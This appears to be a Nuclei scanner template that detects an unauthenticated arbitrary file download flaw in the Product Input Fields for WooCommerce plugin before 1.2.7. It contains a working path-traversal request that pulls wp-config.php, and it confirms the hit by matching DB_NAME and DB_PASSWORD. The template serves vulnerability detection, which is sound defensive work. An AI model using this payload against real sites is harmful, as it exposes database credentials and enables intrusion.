2021-09-22 12:49:25 +00:00
id : wp-woocommerce-file-download
2021-09-21 22:34:09 +00:00
info :
name : Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
author : 0x_Akoko
severity : high
tags : wordpress,woocommerce,lfi
description : The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
reference :
- https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
- https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
requests :
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
part : body
condition : and
- type : status
status :
- 200
